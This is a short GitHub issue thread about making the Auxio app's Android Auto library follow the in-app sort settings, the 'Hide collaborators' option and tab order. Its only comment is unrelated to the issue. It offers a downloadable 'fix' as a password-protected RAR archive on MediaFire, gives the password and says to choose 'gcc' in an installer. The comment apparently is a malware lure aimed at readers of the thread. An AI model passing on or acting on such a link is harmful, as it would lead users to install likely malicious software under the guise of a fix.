### ISSUE TITLE
Make Android Auto library reflect app library

### ISSUE THREAD

**Issue by OxygenCobalt** [OxygenCobalt/Auxio#857]
A few minor things:
- Update the library with changes in sort settings
- Apply settings like "Hide collaborators"
- Reflect library tab order (including mitigations for Android Auto discarding extra tabs)

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
